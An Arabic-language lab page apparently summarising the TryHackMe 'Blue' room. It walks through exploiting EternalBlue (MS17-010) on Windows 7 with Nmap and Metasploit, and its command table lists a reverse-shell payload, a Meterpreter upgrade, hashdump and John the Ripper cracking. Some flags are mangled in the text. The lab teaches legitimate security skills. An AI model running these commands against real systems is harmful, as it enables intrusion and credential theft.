Blue | STY IT Labs
STY IT Labs · TryHackMe · Easy

Blue

استغلال الثغرة الأشهر في تاريخ الأمن السيبراني — EternalBlue، نفس الثغرة اللي دمّرت العالم في هجمة WannaCry سنة 2017. اختراق Windows 7 بـ Metasploit، وكسر كلمات المرور بـ John the Ripper.

Easy 30 – 90 دقيقة 5 مهام · 3 Flags Windows 7 SP1

عن اللاب

اللاب ده بيعلمك استغلال EternalBlue خطوة بخطوة: من فحص Nmap لاكتشاف إن الجهاز عرضة للثغرة، لـ Metasploit للحصول على Meterpreter shell كصلاحية SYSTEM مباشرة، ثم كسر hash كلمة المرور بـ John the Ripper وإيجاد الـ flags في نظام الملفات.

CVE-2017-0144 — EternalBlue (MS17-010)
ثغرة في بروتوكول SMBv1 سرّبتها مجموعة Shadow Brokers من NSA سنة 2017. استُخدمت في WannaCry ransomware اللي أصابت أكتر من 200,000 جهاز في 150 دولة. بتسمح بتنفيذ كود عن بُعد (RCE) من غير الحاجة لأي بيانات دخول، على Windows 7 وServer 2008.
اللاب بيديك SYSTEM مباشرة بدون الحاجة لـ Privilege Escalation منفصلة — EternalBlue بيدّي أعلى صلاحية من اللحظة الأولى.

مسار الحل

1
Recon — Nmap Vuln Scan
فحص البورتات + اكتشاف الثغرات تلقائياً بسكريبتات Nmap
nmap -A -T4–script=smb-vuln-ms17-010
2
Gain Access — EternalBlue في Metasploit
البحث عن الـ module وتشغيله بـ payload مخصص لـ Windows 7 x64
ms17_010_eternalbluewindows/x64/shell/reverse_tcp
3
Escalate — Shell to Meterpreter
تحويل الـ shell العادية لـ Meterpreter بـ post module عشان تستخدم كل المميزات
shell_to_meterpreter
4
Hash Dumping + Cracking
استخراج password hashes بـ hashdump، ثم كسرها بـ John the Ripper
hashdumpjohn –format=nt
5
Find Flags — 3 Flags
البحث عن الـ flags في مواقع مختلفة على نظام ملفات Windows
C:\flag1.txtSystem32\configUsers\Jon\Documents

مرجع الأوامر

الأمرالوصف
nmap -p- -A -T4 <IP>فحص كل البورتات والخدمات
nmap -p 445 –script=smb-vuln-ms17-010 <IP>تأكيد إن الجهاز عرضة لـ EternalBlue
use exploit/windows/smb/ms17_010_eternalblueاختيار الـ EternalBlue module
set payload windows/x64/shell/reverse_tcpالـ payload المناسب لـ Windows 7 x64
use post/multi/manage/shell_to_meterpreterتحويل Shell لـ Meterpreter
hashdumpاستخراج كلمات المرور كـ hashes
john hash.txt –format=nt –wordlist=rockyou.txtكسر الـ NTLM hash
search -f flag*.txtالبحث عن الـ flags في نظام الملفات

المهارات اللي هتكتسبها

SMB Exploitation Nmap Vuln Scripts Metasploit Framework Meterpreter Shell NTLM Hash Dumping Password Hash Cracking